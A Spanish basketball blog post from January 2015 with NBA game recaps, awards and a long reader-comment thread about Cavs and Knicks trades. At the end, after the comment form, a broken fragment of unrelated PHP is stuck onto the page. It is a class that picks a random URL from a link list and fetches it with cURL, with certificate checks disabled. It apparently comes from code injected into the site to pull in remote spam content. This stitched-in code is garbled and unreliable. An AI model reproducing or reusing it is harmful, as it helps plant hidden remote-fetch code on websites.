La Crónica: El déjà vu de Love

06 de January de 2015 por TheDeerHunter

También los Sixers. Hacía falta la visita de los deprimidos Cavs para que los parroquianos del Wells Fargo disfrutaran de la primera victoria local.  Mientras en los despachos los Cavs movían pieza. Por fin sale el frustrado Waiters del equipo y llegan Shumpert y J.R. Smith, aunque se habla de que muy pronto llegará también Dalembert, cortado,  que terminaría de cerrar el círculo a favor de los de Ohio. Los Knicks limpian balance masivamente y Waiters recala en Oklahoma, supuestamente a falta de que éstos lo redondeen con algún otro movimiento más. Habrá que estar atentos.

En otro orden de cosas los Hawks y Warriors continúan imparables, a pesar de sus difíciles compromisos. Los Grizzlies colocaron a los Knicks a tiro de batir su marca de derrotas consecutivas. El dúo Butler-Gasol volvió a ser decisivo, esta vez ante los Rockets…

Thunder 91 – Warriors 117

Vimos a Durant en fase de rodaje e Ibaka continúa su personal viacrucis de este curso. En este punto los Thunder aún no son rivales de los Warriors, que se mostraron más corales que nunca. Demasiado cómodos defensivamente ante la inoperancia rival sólo les faltaba que Barnes, Green y Holiday se pongan a enchufar como si fueran Curry&Thompson.

Hawks 107 – Clippers 98

Menuda gira triunfal que se están marcando los líderes del Este. Sólidos atrás como siempre volvieron a mostrarse excelsos desde la larga distancia. Los Clippers, al contrario, no demasiado atinados ofensivamente y muy lejos de encontrar el nivel defensivo que la presencia de Rivers prometía.

Rockets 105 – Bulls 114

El parcial final de 19-5 que marcó la victoria de los Bulls tiene un nombre propio, Jimmy Butler. En esos 3:19 secaba a todo un James Harden como nadie lo ha hecho esta campaña y le sobraba energía para clavar sus tiros decisivos. Con partidos como el de anoche su nombre está empezando a sonar en los debates por el MVP aunque los Bulls tienen muchas más armas. Ayer Pau Gasol volvió a recordar a aquel que superó a Howard en la final del 2009. Rose y Mirotic estuvieron notables. Los Rockets firman su cuarta derrota en 6 partidos.

Resto de la jornada

Buen partido colectivo de los Sixers contra un Kevin Love hombre orquesta con sólo Tristan y Joe Harris como escuderos. Kemba anotaba 33 en la victoria de Hornets en Boston. La prórroga permitió a Dirk Nowitzki ascender a la 7ª plaza de anotadores de todos los tiempos y, además, se llevó la victoria en Brooklyn. Con Quincy Acy de hombre franquicia los Knicks acumularon su 12ª derrota consecutiva en Memphis. Misma racha de derrotas que suma Minnesota, la de anoche ante Nuggets. Los Wizards rompieron su mala racha en New Orleans con un gran partido de Wall. Hibbert lideró a los Pacers en la victoria en Utah y, finalmente, emocionante choque entre Lakers y Blazers, a pesar de la baja por descanso de Kobe, con un inmenso Lillard.

PREMIOS

MVP: No solo por sus 39 puntos, 6 rebotes y 5 asistencias sino sobretodo por su increíble último cuarto (16 puntos), Damian Lillard es toda una garantía.

Rookie: Un día más, Jusuf Nurkic. El pívot de los Nuggets le va comiendo poco a poco la tostada Mozgov con actuaciones como las de ayer: 14 puntos, 6 rebotes y 4 tapones en apenas 22 minutos. Anoche se enfrentó a Andrew Wiggins, que se fue a los 20 puntos, 7 rebotes y 4 asistencias.

Sorpresa: No sabemos qué es más increíble, si los 19 puntos y 14 rebotes de Quincy Acy o los 12 puntos y 12 rebotes de Meyers Leonard. Elegid vosotros.

Decepción: Muy mal partido de Jeff Green. El alero de los Celtics anotó 7 puntos con un 3 de 13 en TC y no aportó prácticamente nada en otras facetas del juego. El 7 de 22 de James Harden tampoco es como para estar orgulloso.

Esfuerzo en vano: Seguramente Kevin Love no esperaba encontrarse de nuevo en una situación parecida a la que tenía en los Wolves pero las lesiones de sus compañeros le han empujado a ello. 28 puntos, 19 rebotes, 2 robos y derrota, como en los viejos tiempos.

TOP-10:

Imágenes | AP Photos / Getty Images

Comenta

16 comentarios a esta entrada

  1. rumbero dice:
    #1

    Pues si Waiters andaba frustrado en los Cavs, me gustara verlo en el equipo de Durant y Westbrook. Igual hasta tira menos…Dicen que viene para cubrir la más que posible marcha de Jackson la temporada que viene pero yo no lo acabo de ver la verdad.
    A todo esto ayer se comentaba que Larry Sanders quiere dejar el baloncesto…26 años y 3 años por cobrar. Cabeza privilegiada la de este chaval

      Citar

  2. Azabel dice:
    #2

    aunque algo polemico me parece un movimiento excelente para los Cavs, me explico
    Waiters y su supuesto potencial que no se ve desde hace dos años no estaba listo para aportar como sexto hombre que era lo que se necesitaba de el, un año muy gris para este chaval

    a cambio consiguen a

    Shumpert, un dos sumamente fisico y defensor, que les cae como anillo al dedo a su carencia en esa zona, recordemos que los Cavs estaban saliendo como Lebron y Marion de petimetrales, es decir, consiguen un defensor de perimeto que no necesitara de muchos toques, justo lo que necesitaban

    mientras que J.R. Smith es un libro abierto, todos conocemos sus virtudes y sus defectos, pero cuando lograron centrarlo y jugo su rol de sexot hombre con la cabeza bien puesta fue el mejor de la liga, volver a ese nivel no deberia ser problema
    por sus defectos, es cierto que tira chorradas, pero los Cavs estaban necesitando con urgencia un jugador fuera de sus Big 3 capaz de generarse su propio tiro y/o aportar algo de ofensiva, Smith creo que podra hacerlo

    un movimiento mas por un pivote y estarian denuevo en carrera

      Citar

  3. Azabel dice:
    #3

    entiendo un gran movimiento para los Knicks, hay que limpiar ese equipo cuanto antes, alguna vez diueron resultados Feltoin, Melo, Chandler, Smith y Shumpert como hombres claves con Woodson, pero esos tiempos pasaron y rapidamente se encuentran como principales animadores de la agencia libre

    no seria descabellado un trade calderon por Nash? mas espacio para los Knicks, quien en ese caso tendrian el contrato de melo y todo el espacio del mundo, y para los Lakers que si quieren competir, se llevan un base titular en lugar de uno que ya no jugara y por un contrato acorde a su nivel y por el lapso de tiempo del contrato de kobe, gran negocio veo yo

      Citar

  4. Futurman dice:
    #4

    A Calderon para traspasarlo debes incluir una ronda o algo, su contrato es venenoso. En el pack de anoche, recordar que Cavs pillan primera ronda de OKC protegida (pero se la quedan seguro) con lo que pueden usarla para traer el tan deseado 5.

    En rookie del día hay que poner a Mirotic si o si, eso si es un partidazo y no lo de Wiggins perdiendo de 15 😀 Me está sorprendiendo una barbaridad, hasta juganod bien de 3.

      Citar

  5. Azabel dice:
    #5

    Futurman:
    A Calderon para traspasarlo debes incluir una ronda o algo, su contrato es venenoso.

    No creo que sea venenoso, ese ultimo año me suena algo feo, pero un base titular en la liga no vale nunca pero nunca menos de 7 millones, sino nombrame alguno…
    E el precio justo, calde defiende mal, pero tira bien y es un buen organizador, piensa que Deron esta cobrabndo 20 al año y Jennings y Hill 8 cada uno, vamos q no es un mal contrato el de calderon, no sera una ganga pero esta ajustado

      Citar

  6. Futurman dice:
    #6

    Es flojo, flojo… El PG es la posición más potente de la liga y se necesita o una estrella o alguien que pueda defenderlas, y Calde no puede cumplir en ninguno de esos roles. Para sexto hombre, base suplente o tirador si que le da; pero eso no vale 7 millones normalmente. No se, también es que son los Knicks, en Dallas con un entrenador de verdad y un buen equipo rindió muy bien.

    Aun así, no me desdigo, deben dar algo más o comerse un contrato feo para largarle.

      Citar

  7. Triceratops dice:
    #7

    El contrato de Calderón es más venenoso que una cobra, pero creo que es todavía “empaquetable” a algún lugar y los Knicks deben hacerlo pronto antes de que sea demasiado tarde.
    Un trade que creo beneficiaría a ambos equipos (y al propio Calderón) sería un Calderón y Lance Thomas por Tayshaun Prince y Nick Calathes.
    Los Grizzlies conseguirían un buen suplente de Conley (aunque sobrepagado) y un amiguito de Marc Gasol que le motivase un poquito más a renovar. Y los Knicks pues más espacio salarial..

      Citar

  8. Futurman dice:
    #8

    Memphis tiene a Udrih que está haciendo una temporada muy buena y cobra en pipas… Calderón va bien en varios equipos, pero en contenders…. no veo donde encajaría.

      Citar

  9. Azabel dice:
    #9

    se viene abajo la economia de los Nets? q poco duro, hace unos dias leiamos que vendian por lo que venga a deron Williams, y no se los podia culpar

    ahora se habla de un posible trade con el Thunder que involucraria a Lopez a cambio de Perkins, Jones y Thomas ¿?¿? que paso? Lopez a cambio de nada?

    si logran este trade, el thunder lograria armarse junto con waiters de dos potenciales anotadores que carecieron desde hace tiempo, ojala se de, deben hacerse algo YA o sus big 2 empezaran a oir ofertas

      Citar

  10. Nacho dice:
    #10

    Futurman:
    A Calderon para traspasarlo debes incluir una ronda o algo, su contrato es venenoso. En el pack de anoche, recordar que Cavs pillan primera ronda de OKC protegida (pero se la quedan seguro) con lo que pueden usarla para traer el tan deseado 5.

    En rookie del día hay que poner a Mirotic si o si, eso si es un partidazo y nolo de Wiggins perdiendo de 15 Me está sorprendiendo una barbaridad, hasta juganod bien de 3.

    La ronda de OKC va a Knicks, si no me equivoco.
    Lo de Mirotic es espectacular, cierto que muchos no lo vemos como rookie, aunque lo sea. Empezó a entrar en rotaciones largas por las lesiones, pero se ha asentado, ahora falta Dunleavy y aporta de tres. Mola mucho su temporada. Ya sabemos que el RoY es para un jugón individual, pero por loque aporta al equipo, sin duda me quedo con él.
    Me gustan estos Bulls, habrá que ver cómo se desenvuelve Thibbo en PO. Pero el espíritu de equipo de Pau se nota. Ves al tío cerrar el puño muchas veces en jugadas en las que él no ha intervenido, y empieza a contagiarlo, porque ya se lo he visto también a Rose. Si la piña que hacen sigue funcionando compran billete de primera para las finales.

    En relación al trade y los Cavs, Daimiel decía anoche que podría entender el cambio si usaban a tantos perimetrales para lograr el center que necesitan como el comer. Igual van por ahí los tiros.

      Citar

  11. Azabel dice:
    #11

    Dalembert liberado por los Knicks, suena fuerte para los Cavs

    tan malo puede estar Brendan Haywood? lo digo enserio, he visto varios juegos de Dalembert en los ultimos dos años (para mi pesar en Argentina pasan muchisimos juegos de los Knicks y tambien de los Mavs) y madre mia que pedazo de paquetazo, me llama la atención que cualquier tipo alto no pueda hacer lo que Dalembert hace

    de hecho me llamaria poderosamente la atención si Raduljica no pudiera hacer mejor lo que hace Dalembert

      Citar

  12. Futurman dice:
    #12

    Radjulica va a Minnesota.

    Dalembert tiene más nombre, pero está flojo flojo. Como suplente con experiencia lo veo genial, pero sigue faltando un 5 rocoso. Mozgow por la ronda de OKC y la excepción de Bogans estaría genial para los dos equipos.

      Citar

  13. Azabel dice:
    #13

    Futurman:
    Radjulica va a Minnesota.

    Dalembert tiene más nombre, pero está flojo flojo. Como suplente con experiencia lo veo genial, pero sigue faltando un 5 rocoso. Mozgow por la ronda de OKC y la excepción de Bogans estaría genial para los dos equipos.

    Mozgoz seria la hostia, pero hoy dia creo que tiene un precio algo mas alto a lo que pueden aspirar los Cavs, lo mismo Pachulia (de enorme temporada en los Bucks y en toda su carrera si vemos su juego no sus estadisticas),

    en los Nets estan de subasta, pero creo para largar a Pumlee pedirian minimo a Thompson y una primera ronda

    alguien volveria a apostar por Mahinmi? es su ultimo año de contrato, es joven y fuerte, y tamaño le sobra

    yo igualmente, veo el puesto de center para Okafor, no jugo el año pasado, pero su ultima temporada (hace mas de un año) en los Wizards fue de coña, lejos de lo mejor libre que hay hoy en dia

      Citar

  14. Futurman dice:
    #14

    En Denver tienen mucho jugador pasable pero no les da para PO en la vida. Deben o pillar una estrella o reiniciar el proyecto. Las primeras rondas ahora tienen mucho valor y Mozgow no te saca de pobre; y más con Nurkic que es un diamante a pulir y necesita minutos. Ahorrar dinero y pillar ronda me parece un chollo.

    Plumlee no se va de Nets si no hay ofertón, si se va es por que alguno hace una locura y le empaquetan con Brook/JJ/Deron a cambio de muchas rondas/asets jóvenes.

    Okafor/O’Neal y demás están bien como refuerzo de banquillo, es mucho riesgo para Cavs si no los complementan con alguien digno. Si no encuentran otra cosa puede que acaben callendo, aunque ojo con los contenders: O’Neal en Warriors jugó genial.

      Citar

  15. Azabel dice:
    #15

    lo de denver es algo recurrente desde la salida de Melo, 10 u 11 jugadores de buen o algunos hasta de muy buen nivel, pseudos all star como lawson, afflalo, gallinari o faried, pero por alguna razon entre ellos no forman n contender, ni siquiera un equipo con aspiraciones a segunda ronda

    una recontruccion les vendria genial, entregar a Lwason, afflalo, gallinari y Mozgov, y traerse a nash, lin, hill todos con ultimo año de contrato, pero sumarle a Randle, mas la ronda de los Lakers (posible pick top 5), y perder suficientes partidos para tener una propia pick top 10 seria de coña, los lakers mejorarian en todos los aspesctos este y el proximo año, mientras tengan el lastre del contrato de kobe, y los nuggets podrian tener a Randle, dos pick top 10, Nurkic y Faried para pensar en un futuro algo mas prometedor

      Citar

  16. Futurman dice:
    #16

    Si es que el problema es que con el nuevo convenio las rondas valen mucho y los expirings nada. Lakers no suelta su pick 1-8 y a Randle (que no ha podido estrenarse) a no ser que en el pack vayan Davies o Durant xDDD

    Denver debe reconstruir mediante el draft o llevarse a una estrella a cambio de 2-3 tios buenos y morralla/picks. Carmelo mismo podría ser una opción.

    Por último, no se que ve la gente en Faried, está sobrepagadísimo; no puede defender a nadie y no tiene tiro. Es un 5 en un cuerpo de un 3.5 (un 4 sin kilos o un 3 lento). Prefiero a un Morris por la mitad. Denver lo cambiaba ahora mismo por cualquier cosa.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>